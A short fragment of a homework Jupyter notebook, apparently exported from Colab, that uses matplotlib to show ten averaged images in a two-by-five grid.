# + id="pSKZk1NOksHa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 302} outputId="4c8d7e98-3ee3-4c34-b248-0bbe471ae124"
plt.figure(figsize=(10,5))
plt.subplots_adjust(wspace=0.1)
for i in range(10):
plt.subplot(2,5,i+1)
plt.imshow(avg[i])
plt.axis('off')
plt.show()
# + id="CZFzbreXpAF4" colab_type="code" colab={}
| Homework/hw1/mvasquez_part3.ipynb |